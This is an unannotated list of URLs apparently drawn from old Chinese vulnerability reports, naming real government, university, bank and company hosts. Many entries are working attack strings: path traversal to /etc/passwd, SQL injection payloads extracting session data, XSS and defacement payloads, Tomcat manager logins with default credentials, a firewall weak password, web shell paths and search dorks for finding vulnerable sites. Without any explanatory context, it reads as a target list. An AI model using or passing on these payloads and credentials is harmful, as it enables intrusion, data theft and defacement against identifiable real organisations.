http://oms.haier.com/omsframe/security/loginInit.action http://www.sciclife.com/manage/content/docmanage/download.jsp?filePath=/bxxz/renshenbaoxiantoubaotishishu.pdf http://www.sciclife.com/manage/content/docmanage/download.jsp?filePath=/bxxz/../../content/docmanage/download.jsp http://www.sciclife.com/manage/content/docmanage/download.jsp?filePath=/bxxz/../../../../../etc/passwd http://www.yichengpin.com www.yichengpin.com http://www.yichengpin.com http://www.yichengpin.com/order/order-myOrderPackageDetail-8801-1.do http://www.yichengpin.com/order/order-myOrderPackageDetail-5000-1.do http://xscxjy.suda.edu.cn/PersonInfo/ShowAnswer.aspx?UserScoreID=701”最后的ID,即可直接获取到任意人员的错误报告,然后通过页面html代码的分析,即可把题目抓取出来,最后生成题库。 http://v2014.rccms.com/mobile/index.php?m=search&a=resume_search&id=2&d=down http://v2014.rccms.com/mobile/index.php?m=search&a=hire_search&id=2&d=down http://v2014.rccms.com/mobile/index.php?m=search&a=resume_search&id=2&d=down http://v2014.rccms.com/mobile/index.php?m=search&a=resume_search&id=2%20and%201=0&d=down http://v2014.rccms.com/mobile/index.php?m=search&a=resume_search&id=2%20and%201=1&d=down http://v2014.rccms.com/mobile/index.php?m=search&a=resume_search&id=2%20and%201=@`%27`%20and%201.union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13%23%27&d=down android:label="@string/create_pass_title android:name="com.yulong.android.createpassword.CreateSecurityPasswordStep2Activity android:screenOrientation="nosensor"/ http://tg.gmw.cn http://ac.cnas.org.cn/cnas/jsp/login.jsp http://store.tdxinfo.com/tops-front-purchaser/facade/signin http://218.247.254.125/src/acloglogin.php http://sh.cltt.org/Web/Login/pscp01001.aspx http://www.bjgjj.gov.cn/wsyw/wscx/gjj_cx.jsp?grdjhh=XXX&gjjzh=YYY&vnv=ZZZ&lx=0 https://vpn1.ahmu.edu.cn/prx/000/http/localhost/login content://com.yulong.android.ntfcationmanager.provider/ntfpkgperm http://bgy.ata.net.cn/CUST01hgkw/ http://app.weixin.gzuni.com/z/liantong/order/selectedtel?agency_id=&gid=16&taocanid= http://app.weixin.gzuni.com/z/liantong/order/selectedtel?agency_id=&gid=16&taocanid= http://app.weixin.gzuni.com/z/liantong/order/noiphone?agency_id=&gid=16 https://202.121.96.148/prx/000/http/localhost/login https://202.120.144.88/prx/000/http/localhost/login http://183.221.33.4/进入得知弱口令(用户:useradmin密码:venus.user),进去发现遂是一防火墙也,然,可控之。 http://app.weixin.gzuni.com/z/liantong/order/free?gid=49&agency_id=00002 http://epay.woigz.cn/z/liantong/order/view?agency_id=00002&order_num=WD2014112416445768 https://bx.baosteel.com/prx/000/http/localhost/login http://www.hvri.ac.cn/showperson.aspx?id=19 http://drops.wooyun.org/papers/2893) android:show_fragment=com.android.settings.ChooseLockPassword$ChooseLockPasswordFragment;B.confirm_credentials=false;launchFlags=0x00008000;SEL;action=android.settings.SETTINGS;end http://app.weixin.gzuni.com/z/liantong/order/noiphone?gid=62&agency_id= http://epay.woigz.cn/epay/consignee.php?gid=62&agency_id=&taocanid=174&packageid=350&monthid=0 http://epay.woigz.cn//z/liantong/order/view?agency_id=00002&order_num=WD2014112417045482 url:http://61.174.213.251:8088/manager/html user:admin pass:admin http://app.weixin.gzuni.com/z/liantong/order/noiphone?gid=53&agency_id=00001 http://222.73.72.49/site/index http://demo1.zving.com/ http://echo.kibey.com/member/setting http://www.kibey.com/system/setting http://61.130.248.206:8088/ltmst/manager/index.jsp url:http://61.130.248.206:8088/manager/html user:admin http://www.gd10198.com.cn/index.php?mod=member http://oa.crcc.cn/ztjinweb/netpage.nsf/frmmainpage?open http://home.gmw.cn/index.php http://www.xinzhihr.com/admin/link.asp http://www.xinzhihr.com/group1.asp?flag=&nwww.xinzhihr.com/rlgc_show.asp?flag=&j_id=651 www.xinzhihr.com/rlgc_show.asp?flag=&j_id=651 inurl:BBS/index.jsp?sectionId= http://www.jcsyxx.pudong-edu.sh.cn/BBS/index.jsp?sectionId=ebbs01 http://www.nths.cn/BBS/index.jsp?sectionId=ebbs02 http://qb3z.mhedu.sh.cn/webschool/BBS/index.jsp?sectionId=ebbs01 http://zjsdszx.zje.net.cn:82/webschool/BBS/index.jsp?sectionId=ebbs02 http://218.23.208.7:8888/webschool/BBS/index.jsp?sectionId=ebbs32 http://www.goldsword.cn/ http://game.kaixin001.com/hhsh.html http://221.233.161.98:8088/manager/html http://www.zhalantun.gov.cn/bs.aspx?type=%e6%94%bf%e5%ba%9c%e9%83%a8%e9%97%a8&TIMES= url:http://www.zhalantun.gov.cn/shell.aspx http://fms.crcc.cn/ http://www.wxlibiao.com/home/?uid=10549 inurl:/dpma/FWeb/ http://bm.tangshan.gov.cn/ http://www.dlgaoji.com/newslist.aspx?colid=WebJob http://developer.wandoujia.com http://developer.wandoujia.com/.wp-config.php.swp http://220.181.167.34/_logcrawler/ http://114.66.198.56:8001/auth/login/?next=/ http://search.js.cei.gov.cn/jscredit/news.php?id=6170 http://v2014.rccms.com/mobile/member.php?m=resume&login=tstuser&pass=96e79218965eb72c92a549dd5a330112&type=pmember&id=2&d=down http://v2014.rccms.com/mobile/member.php?m=person_works&login=tstuser&pass=96e79218965eb72c92a549dd5a330112&type=pmember&id=2&d=down http://v2014.rccms.com/mobile/member.php?m=resume&login=tstuser&pass=96e79218965eb72c92a549dd5a330112&type=pmember&id=2&d=down http://v2014.rccms.com/mobile/member.php?m=resume&login=tstuser&pass=96e79218965eb72c92a549dd5a330112&type=pmember&id=2%20and%201=@`%27`%20and%201.union%20select%201,2,3,4,5,6,7,8,9%23%27&d=down http://58.213.112.250:65486/jsbm/XZXueLiXueWeiZS.aspx?type=1&userId=32669 https://sslvpn.sinopec.com/ https://crmsys.lube.sinopec.com http://www.crcc.cn/ http://w4.easou.com/ http://115.28.78.40/yhotel/login.action http://115.28.78.40/yhotel/system.jsp url:www.cnnc.com.cn http://www.cnnc.com.cn/config.aspx http://zw.xctour.com/content.aspx?ri=%2014072 http://159.226.3.199/ http://wooyun.org/bugs/wooyun-2010-049745,也有人提了SQL注入,我来找找其他的漏洞吧。去官网下BiWEB商城版最新的5.8.4来看看。 http://pl.youku.com/.svn/entries http://ads.youku.com/.svn/entries http://211.151.146.177/.svn/entries http://211.151.146.178/.svn/entries https://147.243.230.173/rf/ https://147.243.230.173/web-console/ http://dept.wyu.edu.cn/cszx/ https://jira.foxitsoftware.cn/secure/Dashboard.jspa https://jira.foxitsoftware.cn/secure/Signup!default.jspa http://wz.xhqedu.gov.cn/Newsview.asp?id=133 http://wz.xhqedu.gov.cn/admin/login.asp http://tjl.xhqedu.gov.cn/Newsview.asp?id=106 http://tjl.xhqedu.gov.cn/admin/login.asp http://18z.xhqedu.gov.cn/NoticeView.asp?id=17 http://18z.xhqedu.gov.cn/admin/login.asp http://ysl.daqing.gov.cn/czwh.asp?ClassID=26 http://ysl.daqing.gov.cn/admin_admin.asp http://www.lylsj.gov.cn/root/zcfg/ShowContent.asp?id=1300 http://zqz.xhqedu.gov.cn/TeachView.asp?id=16 http://zqz.xhqedu.gov.cn/admin/login.asp http://www.jbsz.gov.cn/more.asp?lm_id=1 http://www.dcddwgk.gov.cn/newscontent.asp?lsh=886 http://www.dcddwgk.gov.cn/admin/login.asp http://116100.bbn.com.cn http://116100.bbn.com.cn/colorring/ringcatasearch.jsp http://159.226.251.162/ http://eps.mep.gov.cn/EPS/ https://github.com/coder-chenzhi/TestPython/blob/649f15581f02b4aa0b32c0c5b598e5586bf52518/TestPython/src/Network/sendEmail.py https://mail.zju.edu.cn http://www.xiamenair.com/Specialoffers/Detail?guid=11577bf1-8032-4eba-a725-49e0d81004d8 http://www.ntgjzgs.cn/ic.aspx?id=1314 http://114.112.70.134/ total:4835348 http://www.huafans.cn/robots.txt https://wap.wuhan.wandamoviepark.com https://wap.wuhan.wandamoviepark.com/LogIn/UpdateUserPwd/?Name=&Phone=手机号码&Pwd=新设密码 http://123.125.36.161/ ip:14.17.107.198 http://saps.sysu.edu.cn/content.asp?c=68&m=656&n=3074&todo=showinfo http://bbs.share.youku.com/robots.txt http://www.whjdsc.com/ http://www.whjdsc.com/goods_sales.php?act_id=4 http://jira.cubrid.org/secure/Dashboard.jspa http://jira.cubrid.org/secure/Signup!default.jspa http://qsjk.yundasys.com/check/index.php?bm=112009&z=82f721440fafdb0b947204acbff3d473 http://qz.yundasys.com:7777/nbsw/wdkjtj/index.php?gs=461001&user=17164&key=183e567be0fdc31ce2cb4f554911155c# https://e.boc.cn/ocfs/more.do?type=aff&code=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%28111%29%3C/scRipt%3E&curPage=1 https://e.boc.cn/ocfs/more.do?type=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x000C70%29%3C/scRipt%3E&code=main&curPage=1 http://club.sanguosha.com/robots.txt http://bbs.xunlei.com/robots.txt http://www.ctrip.com/Community/action/08Photo/look.asp?aid=347750 http://iac.hit.edu.cn/article/printpage.asp?id=123 http://111.206.22.196:8080/login.action https://mail.iqiyi.com/owa/auth/logon.aspx?replaceCurrent=1&url=https%3a%2f%2fmail.iqiyi.com%2fowa http://jira.pentaho.org/secure/Dashboard.jspa http://jira.pentaho.com/secure/Signup!default.jspa http://www.jira.cn/secure/Dashboard.jspa http://www.jira.cn/secure/Signup!default.jspa http://www.zjxu.edu.cn/first/Index.aspx http://218.75.60.19:8081/cjcx_gr_login.asp http://jira.omnirom.org/secure/Dashboard.jspa http://jira.omnirom.org/secure/Signup!default.jspa http://mobile7.cn注册了开发者账号,在开发者信息---财务信息---上传证件那里 http://www.zjxu.edu.cn/first/Index.aspx http://218.75.60.19:8081/cjcx_gr_login.asp http://addon.discuz.com/?@appbyme_app.plugin http://www.appbyme.com/ http://ee.hnu.cn/eeold/php/info/detail.php?id=19376 http://www.jzwsqwj.gov.cn/qiaowu/printpage.asp?id=1886 http://www.fyhouse.net/printpage.asp?id=5800 http://www.jzkx.org.cn/xiehui/printpage.asp?id=598 http://www.jzhbj.gov.cn/jzhbj/zxcy/chuangyou/printpage.asp?id=156 http://220.249.204.131/ ip:223.4.113.109 http://ssx.so/xx http://pan.baidu.com/s/1o6skD5o,提取码:d0wu,解压密码:360poc123。 http://ahadl.org/ http://202.38.93.29//asearch.do?status=showpage&LanguageType=0 http://123.125.117.168/ http://123.125.117.168/phpmyadmin/ http://jira.xwiki.org/secure/Dashboard.jspa http://jira.xwiki.org/secure/Signup!default.jspa http://tsk.erya100.com/schoolProvinceAction http://zgsy.tsk.erya100.com/player/playerAction!getPlayList?videoId=9062 http://cuc.tsk.erya100.com/player/playerAction!getPlayList?videoId=9062 http://muc.tsk.erya100.com/player/playerAction!getPlayList?videoId=9062 http://hhu.tsk.erya100.com/player/playerAction!getPlayList?videoId=9062 http://chengyi.tsk.erya100.com/player/playerAction!getPlayList?videoId=9062 http://ccnu.tsk.erya100.com/player/playerAction!getPlayList?videoId=9062 http://gxu.tsk.erya100.com/player/playerAction!getPlayList?videoId=9062 http://gallery.kissyui.com/api/coms?_ksTS=1404351614399_19&callback=jsonp20&len=12 http://px.ops.ikang.com/ https://px.ops.ikang.com/ url:http://61.132.81.34:80/manager/html user:admin url:http://121.8.227.12:80/manager/html user:admin inurl:hwky.wai site:12306.cn hwky.wai/index.action http://124.74.250.197/gxjf/login.jsp url:http://124.114.203.174:80/manager/html user:admin url:http://125.70.9.188:80/manager/html user:admin pass:tomcat http://demo.zoomla.cn//Common/FileService.aspx http://www.dx010.net/ http://tools.sdo.com/ http://tools.sdo.com/phpinfo.php http://tools.sdo.com/p.php#bottom http://www.furtheredu.zjb.gov.cn/showpxxm.asp?id=25 http://220.181.153.209:8080/manage/login.action url:http://58.250.25.235:80/manager/html user:admin pass:admin XXX.edu.cn/userAttributesView.portal?userId=xxxx xx.edu.cn/getBackPassword.portal进行找回密码操作 xx.edu.cn/userAttributesEdit.portal http://studytv.cctv.com:80/ http://saunion.scnu.edu.cn/ www2.scnu.edu.cn http://saunion.scnu.edu.cn/member/inc/9.php https://intl.ccb.com/FrankFurt/V1/CN/STY4/loginVN.jsp?FF_LANGUAGE=CN%22%3E%3C/iframe%3E%3Cscript%3Ealert%281%29%3C/script%3E https://api.wocloudpaas.dumpcloud.com http://finance.sbs.edu.cn/HomeDetails_Index.aspx?actionType=crule_item&actionID=44 http://210.35.72.6:8009/HomeDetails_Index.aspx?actionType=crule_item&actionID=61 http://202.121.241.222:8001/HomeDetails.aspx?actionType=ann_item&actionID=29 http://cwc.gxnu.edu.cn/homedetails_index.aspx?actiontype=crule_item&actionid=14 http://finance2.shmtu.edu.cn:8088/homedetails_index.aspx?actiontype=work_item&actionid=129 http://www.enetedu.com/index.php/Notice/newsBulletin?ID=1047&NT=1 http://www.enetedu.com/index.php/Course2/detail?id=614 http://www.enetedu.com/index.php/Event/teachTopicC?id=14212&courseID=&courseType=2%E2%80%99 http://www.enetedu.com/index.php/Event/teachShareC?id=14237 http://www.enetedu.com/index.php/Course2/detail?id=614 http://www.enetedu.com/index.php/Event/teachTopicC?id=14212&courseID=&courseType=2%E2%80%99 http://smb.hunan.gov.cn/ http://api.my.letv.com/vcm/api/list?type=video¬ice=1&pid=40186&xid=0&mmsid=&rows=10&page=2&ifpic=n&sort=&_=1416982280016 http://www.kqtjzx.com/happy/tjshow_content.asp?id=27 http://202.104.70.3:808/active/tjshow_content.asp?id=20 http://medical.cyszxyy.com:8080/happy/tjshow_content.asp?id=7 http://bjz.yqedu.com.cn/happy/tjshow_content.asp?id=19 http://itha.nmciq.gov.cn/happy/tjshow_content.asp?id=18 http://www.wd120.com.cn:88/happy/tjshow_content.asp?id=17 http://lady.weibo.com/hiddphp.php?ac=getwb&bid=1&limit=20&page=1&type=&u=&_=1416952728705&order=1 http://mail.yto56.com.cn/ http://channel.chinanews.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://photolib.chinanews.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://sou.chinanews.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://bbs.fumu.com/forum.php http://125.88.10.244/iCloud/ url:http://125.88.10.244:80/manager/html user:tomcat pass:tomcat inurl:templet/view_0.asp?info_id= http://www.luzhoutianli.com/ https://42.120.73.5/+CSCOE+/logon.html http://drops.wooyun.org/papers/3451 http://www.kqtjzx.com/happy/infos_content.asp?bid=2&sid=5&id=63 http://xqxtj.com/health/infos_content.asp?bid=1&sid=2&id=54 http://218.75.210.182:12345/happy/infos_content.asp?bid=2&sid=5&id=35 http://www.xy2fytjzx.cn/happy/infos_content.asp?bid=6&sid=10&id=64 http://medical.cyszxyy.com:8080/happy/infos_content.asp?bid=3&sid=7&id=39 http://tsljk.com/health/infos_content.asp?bid=4&sid=18&id=69 http://www.wd120.com.cn:88/happy/infos_content.asp?bid=3&sid=7&id=39 http://itha.nmciq.gov.cn/happy/infos_content.asp?bid=3&sid=7&id=189 http://218.75.210.182:12345/happy/info_s.asp?page=1&bid=1&sid=1 http://www.syyyy.cn:82/happy/info_s.asp?page=1&bid=1&sid=1 http://tsljk.com/health/info_s.asp?page=1&bid=4&sid=18 http://tjzx.hzch.gd.cn/happy/info_s.asp?page=1&bid=1&sid=2 http://xqxtj.com/health/info_s.asp?page=1&bid=1&sid=2 http://www.xy2fytjzx.cn/happy/info_s.asp?page=1&bid=1&sid=2 http://202.119.199.83:8080/jdh http://202.119.199.83/ http://202.119.199.83:8080/jdh/admin/admin!login.action http://202.119.199.83:8080/jdh/1.jsp http://202.119.199.83:8080/jdh/oen8.jsp http://web.999.com.cn/sj/pro.aspx?tiao=1 http://web.999.com.cn http://opto.hisense.com/ http://my.edu.wanfangdata.com.cn/Account/ForgetPassword http://my.edu.wanfangdata.com.cn url:http://218.17.225.88:80/manager/html user:tomcat pass:tomcat url:http://221.6.105.182:80/manager/html user:admin http://www.taizhoumsa.gov.cn/cbjk/index.asp http://www.utou.cc/Event/Content/id/111 http://www.utou.cc/Event/Content/index.php?id=111 http://www.cjs.com.cn/cjsL2/func.asp?classid=484&id=27336496 http://swj.gaoyou.gov.cn//admin/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.asp http://swj.gaoyou.gov.cn//admin/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.asp http://www.bzein.gov.cn/showflfg.asp?id=109 http://dept.scfai.edu.cn/ http://www.enetedu.com/index.php/Course/indexScience?&boardname=%B5%E7%C6%F8%D0%C5%CF%A2%C0%E0 http://58.248.56.116/ http://58.248.56.116/status?full=true http://58.248.56.116/zecmd/zecmd.jsp http://www.scal.com.cn/invite2011/admin/default.aspx http://www.scal.com.cn/invite2011/admin/default.aspx http://www2.zzu.edu.cn/art/NewsInfo.asp?id=258 http://a.game.3gtest.gionee.com/ http://www.haseemobile.net/index.php?act=index&app=search&brand_id=&cate_id=1 http://xxxy.sut.edu.cn/upload/11415755046546.jsp?sort=1&dir=E%3A%5C)该脚本可访问修改目标服务器全部文件,查看网站原始代码。 http://dky.njnu.edu.cn/Search.aspx?kw=1 http://www.qlfy.org.cn/new.asp?cataid=80&id=1052 http://ufinder.duapp.com/lib/ufinder/server/ufinder.php?cmd=ls&target=/../../../../../../../../../../../ http://ufinder.duapp.com/lib/ufinder/server/ufinder.php?cmd=download&target=/../../../../../../../../../../../../../etc/passwd http://www.nduoa.com/message/noticeDetail?id=30 http://www.hbhk.com.cn/index.action http://www.gjj.gov.cn/WebSite/ChaxunLP.aspx http://www.yc51890.com/login.action http://csxy.znufe.edu.cn/htm/doc_search.aspx?keywords=1 http://wto.whu.edu.cn/Index-detail-pid-1-cpid-77-cid-4770 http://www3.ahu.edu.cn/ysxy/list_info.asp?Infoid=550 http://mall.woniu.com/mm/user/delorder http://fulltext.lib.pku.edu.cn/wasadmin/index.html http://support1.lenovo.com.cn/lenovo/wsi/admin_del/Login.aspx http://sqlmap.org http://www.nduoa.com/ http://www.nduoa.com/test78.php http://zabbix.jpush.cn http://zabbix.jpush.cn//httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28sessionid,0x7e,userid,0x7e,status%29%20as%20char%29,0x7e%29%29%20from%20zabbix.sessions%20where%20status=0%20and%20userid=1%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 ikang.com/760312) www.ikang.com http://pj.ikang.com/ http://ops.ikang.com/phpinfo.php http://218.5.5.31:8080/frame.jsp http://sfy.njnu.edu.cn/education_info.asp?bid=&sid=80&nid=120” http://www.yjzjj.gov.cn/downfile.php?filename=../../downfile.php inurl:about.php http://www.vip-1688.com/ http://www.vip-1688.com/madminydl/admin/index.php?action=add www.portaura.com http://119.167.156.148:8080 http://119.167.156.148:8080/help/help2.html http://119.167.156.148:8081/ http://119.167.156.148:8081/uploadfiles/1.asp res://*/Models.ShowRoomSysDBModel.csdl|res://*/Models.ShowRoomSysDBModel.ssdl|res://*/Models.ShowRoomSysDBModel.msl;provider=System.Data.SqlClient;provider http://qzlx.ynau.edu.cn/article_Show.aspx?artID=192“ URL:http://m.yaofang.cn/user/doLogin POST:btnRegister=%E7%99%BB%E9%99%86&go=&logintype=0&password=bma123&username[]=493639943@@qq.com http://sports.njau.edu.cn:8038/video_view.php?v_id=56 http://sfy.njnu.edu.cn/student_info.asp?bid=6&sid=25&nid=4581 http://www.bdwjj.gov.cn/admin www.bdwjj.gov.cn/admin/leftFrame.php代码看看 http://www.bdwjj.gov.cn/admin/manage/new_display.php?typeid=492&borderid=459 http://58.32.246.78:8001/ http://www.youngor.com/comment.do?artid=20130301012636 http://sqlmap.org http://comp.yonyou.com/hr/sm/Sm_index.action http://comp.yonyou.com/base/par/Par_index.action http://www.sneb.com.cn/enWeb.do?method=moduleInfo&moduleId=-1+OR+17-7%3d10&newsId=6414&type=100 http://e.cic.cn/ http://e.cic.cn/web/basic/fileDownload.do?fileName=../../../../../../../../../../../etc/network/interfaces http://www.whhtz.com/about.php?classid=35 http://sqlmap.org http://www.idc.hk/ArticleList.aspx?colid=10 http://gzjyjt.cn/site/search.aspx?action=search http://116.228.70.237/ http://m.ifchange.com/u3499/user_auth/index?app=passport&jsreferer=http%3A%2F%2Fm.ifchange.com%2Fu3499%2Fpositions%2Fdetail%3Fapp%3Dcareer%26bundle%3Dbasic%26id%3D【id】%26auto_post%3Dtrue#inputmobile/new http://m.ifchange.com/u3499/user_auth/index?app=passport#inputmobile/changepwd/【用户手机号】 http://m.ifchange.com/u3499/user_auth/index?app=passport#inputmobile/changemobile http://www.libsys.com.cn/huiwen_app_center_2.php http://ebusiness.tongfangpc.com.cn/login.action?errormsg=login.error http://ulive.univs.cn/event/event/template/list/213/0.shtml http://ulive.univs.cn http://221.122.33.5:9020/ http://221.122.33.5:9020/tjsinfo/nhcrms/system/login.action http://www.ltpower.net/ http://zybj.jnu.edu.cn/ http://jpkc.gmc.edu.cn/gwsy/index.asp http://210.36.18.31/slstx/ http://glz.dgpt.edu.cn/ http://xxgcxy.gdut.edu.cn/user/reg.asp http://qghgxy.gdut.edu.cn/user/reg.asp http://tmjtxy.gdut.edu.cn/user/login.asp http://gsgc.gzhu.edu.cn/szgc/user/reg.asp http://nhsjd.gzhu.edu.cn/user/reg.asp http://eeit.hut.edu.cn/user/reg.asp http://glsxjd.dgpt.edu.cn/user/reg.asp http://glz.dgpt.edu.cn/user/reg.asp http://jdsxjd.dgpt.edu.cn/user/reg.asp http://etc.xmut.edu.cn/user/reg.asp http://www.zjyy.com.cn/mnwk/ http://sps.sysu.edu.cn/zsyx/ http://202.116.65.190/xhyxt/index.asp http://www.jsict.com/jsp/cmsNews/cmsNewsView.action http://oa.yto56.com.cn/C6/Jhsoft.Web.login/GetPassWord.aspx?flag=getEmail&Username=test http://bme.sjtu.edu.cn/NewSelect.aspx?key=1 http://125.88.6.136/zecmd/zecmd.jsp http://125.88.6.163/zecmd/zecmd.jsp http://www.gametea.com http://wap.gf.com.cn/mobile.do?method=downLoadFile&fileName=mobile.do http://wap.gf.com.cn/mobile.do?method=downLoadFile&fileName=../web.xml http://www.vsread.com/index.php/honor/rydt/jianjie?uid=44240&t=1 http://211.151.50.93/dashboard.action http://manage.soku.com:8080/ http://szkh.gtja.com/Json/Car/CarXingDataList.aspx http://szkh.gtja.com/Login.aspx http://szkh.gtja.com/Car/CarXing.aspx http://szkh.gtja.com/Promotion/Industry.aspx http://gdkh.gtja.com http://gdkh.gtja.com/Tools/ http://gdkh.gtja.com/admin/ http://gdkh.gtja.com/uploadfiles/ http://gdkh.gtja.com/fckedit/ http://www.morefuns.com.cn/products.php对type未过滤。 http://211.146.5.63/jsp/sites/index.jsp http://211.146.5.63/jsp/sites/pxztcontent.jsp?sub_id=1 http://211.146.5.63/jsp/sites/pxztleft.jsp?keyword=1 http://211.146.5.63/jsp/sites/site?action=newsinfo&id=1&newname=?%A8%BA%A8%ACa%A1%E3??%A8%B2&newsid=1 http://211.146.5.63/jsp/sites/site?action=secondmore&newname=%CD%A8%D6%AA%B9%AB%B8%E6&subjectid=1 http://211.146.5.63/jsp/sites/site?action=secondmore&subjectid=1 http://211.146.5.63/jsp/sites/site?action=secondmore&flag=1&orderby=title&subjectid=1 www.km119net.com/web_admin/index.aspx http://www.km119net.com/upload/201307/20130704030902.doc test.52xinyou.cn/xykj/login.aspx http://125.35.63.11/Default.aspx http://125.35.63.11:80/ywdt/homepage/provincecodelist.aspx?DateTime=2014-09-18 http://125.35.63.11/Admin/Default.aspx http://www.quamnet.com/markethotsector.action http://tuanbai.baidu.com/apiCheckv1/?url=http://10.42.7.78 http://www.gdgz.gov.cn:8088/prms/sm/login/login!doLogout https://www.ehowbuy.com/login/login.htm?targeturl=%2Fuser%2Findex.htm,然后点击“忘记登录密码” https://trade.ehowbuy.com/account/resetpwd.htm https://trade.ehowbuy.com/account/resettxpwd.htm http://www.xjwh.gov.cn/admin http://www.xjwh.gov.cn/admin/userManagerSystem/Role/RoleDetail.aspx?ChannelID=264 http://119.147.215.26:28017/ http://www.webgobetter.com/web/index.php http://183.203.36.13:89/web/index.php http://115.28.233.30:7921/web/root http://www2.lnxjyj.com:7921/web/root http://1.93.4.40:89/web/root http://183.203.36.13:89/web/10080 http://183.203.36.13:89/web/index.php http://218.89.3.21:89/web/root http://www.bj-tofi.com:89/web/root http://121.199.29.166:89/web/root http://www.gobetter.cn/plus/list.php?tid=1 http://cwch.ahu.edu.cn/querynetweb/admin/ShowPersonRights.aspx?Gh=07139 http://210.45.92.21/admin/ShowPersonRights.aspx?Gh=001001 http://cwc.sxufe.edu.cn/KfWeb/admin/ShowPersonRights.aspx?Gh=10002888 http://210.31.114.125/KfWeb/admin/ShowPersonRights.aspx?Gh=10005888 http://58.16.80.232/kefa/admin/ShowPersonRights.aspx?Gh=198501001 http://210.45.92.20/admin/ShowPersonRights.aspx?Gh=001 http://servexpress.digitalchina.com/sms/login.asp http://servexpress.digitalchina.com http://sese.sjtu.edu.cn/DetailInfo.php?num=14&cnum=16&ID=1277 https://github.com/Dianjoy/cpa_collaction/blob/cd75778b9ea2345de9e4a20a5c8b5d6aa0fb0bf5/test/quote.html https://github.com/Dianjoy/zhuan-site/blob/master/survey/login.php http://www.strongsoft.net/ http://www.ctrip.com/Community/action/08Photo/who.asp?name= http://www.ctrip.com/Community/action/08Photo/who.asp?name=%22%2F%3E%3Cdiv%3E%3Cdiv+style%3D%22+width%3A1000px%3B+height%3A1000px%3B+position%3Aabsolute%3B+top%3A50%25%3B+left%3A50%25%3B+margin-left%3A-400px%3B+margin-top%3A-250px%3B+background%3Ared%3B;font-size:2cm;%22%3EHacked%20By%20CanF%3C%2Fdiv%3E http://newver.api.dedecms.com/index.php?c=info57&version=V57_GBK_SP1&phpver=5.2.3&os=WINNT&mysqlver=5.00&uptime=2013-09-22 ip:121.199.6.28 http://**.**.**/phpmyadmin/_ http://**.**.**/news_view.phpid=55注入点 http://oa.fengedu.com:8888 http://123.147.164.34:8080/default.aspx http://www.baidu.com/s?wd=帮助%20正在读取数据...%20注册用户%20系统用户%20用户名%3A%20密码%3A%20南京苏亚星资讯科技开发&pn=70&oq=帮助%20正在读取数据...%20注册用户%20系统用户%20用户名%3A%20密码%3A%20南京苏亚星资讯科技开发&ie=utf-8&rsv_pq=a65219180002c407&rsv_t=1bf6peBE4nxiKJ9IRZZHqdmHEUoE5yoanRcAf8sP1AjtIh3cHKM3bZuGPtc&rsv_page=1&f=8&rsv_bp=1&tn=baidu http://183.167.250.28:81/Public/Asp/LogValid.asp http://183.167.250.28:81/Public/Asp/LogValid.asp http://ecargo.shenzhenair.com:23454/login.aspx ip:121.199.7.120 http://benyouhui.it168.com/xml http://my.solution.it168.com/image/_svn/tmp/ http://benyouhui.it168.com/lepad/lepad.zip http://benyouhui.it168.com/beauty.zip http://benyouhui.it168.com/root.txt http://202.109.197.161/ggjg/ http://202.109.197.161/ggjg/FCKeditor/_samples/default.html http://202.109.197.161/ggjg/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx http://202.109.197.161/ggjg/FCKPro/Files/media/drv.asp/33.jpg http://www.rhxwl.com/Server.asp http://www.lqmyjj.com/qyzc/viewnews.asp?id=46164 http://www.linhaihome.com/qyzc/viewnews.asp?id=7466 http://www.tzmyw.com/qyzc/viewnews.asp?id=48669 http://www.xsunion.com/qyzc/viewnews.asp?id=23029 http://xc.xsunion.com/qyzc/viewnews.asp?id=23029 http://www.xjmyjj.com/qyzc/viewnews.asp?id=18641 http://www.ttmyjj.com/qyzc/viewnews.asp?id=24577 http://www.yhmyjj.com/qyzc/viewnews.asp?id=25514 http://www.jjmyjj.com/qyzc/viewnews.asp?id=18629 http://www.hyqmyjj.com/qyzc/viewnews.asp?id=41568 http://jh.zjmy.net/qyzc/viewnews.asp?id=18597 http://www.sxpjgtmyjj.com/qyzc/viewnews.asp?id=22311 http://www.sxkfqjj.com/qyzc/viewnews.asp?id=22170 http://www.sxjhjj.com/qyzc/viewnews.asp?id=26462 http://www.lqmyjj.com/qyzc/viewnews.asp?id=46164 http://www.sxjhjj.com/qyzc/viewnews.asp?id=26462 http://oa8000.com,先登陆user普通用户,然后存在XSS的地方在网上交流,论坛的地方 http://www.cloud511.com/case http://www.smdyf.cn/getNewsDetail.do?newsID=7771 http://www.zjrrt.com/getNewsDetail.do?newsID=7263 http://www.ewj2009.com/getNewsDetail.do?newsID=7561 http://www.zjtydyf.com/getNewsDetail.do?newsID=6976 http://test.jhtht.com/getNewsDetail.do?newsID=7206 http://www.sydyf.com/getNewsDetail.do?newsID=6941 http://jylbx.com/getNewsDetail.do?newsID=6902 http://www.gxjjls.com/getNewsDetail.do?newsID=6734 http://www.hangzhoudrt.com/getNewsDetail.do?newsID=6959 http://test.hzyibai.com/getNewsDetail.do?newsID=7093 http://www.zgyb.cn/About.asp?ABOUTID=67 http://www.zgyb.cn:8080/web/device/login?lang=1 http://www.rhxwl.com/Server.asp http://www.sxpjgtmyjj.com/bszl/view.asp?id=6900 http://jh.zjmy.net/bszl/view.asp?id=6900 http://xc.xsunion.com/bszl/view.asp?id=6900 http://www.xsunion.com/bszl/view.asp?id=6900 http://17f.go5le.net/bszl/view.asp?id=23325 http://www.wooyun.org/bugs/wooyun-2014-084111/trace/e37a32c96308424eae2ea9035117c4e9这个说我提交重复了,但是你给的那个是标题地方,我这个是邮箱地方,虽说位置一样,但是插的地方不一样啊,而且他那个还有字节限制,我这个没有限制 http://demo.173cms.com http://super-nanshen.qiniudn.com/avatar_2014-11-28_54780361bdea1.jsp?f=1.txt&t=123 http://boy.super.cn/nanshen//1/index.php/Home/Index/getList?page=1&scope=global 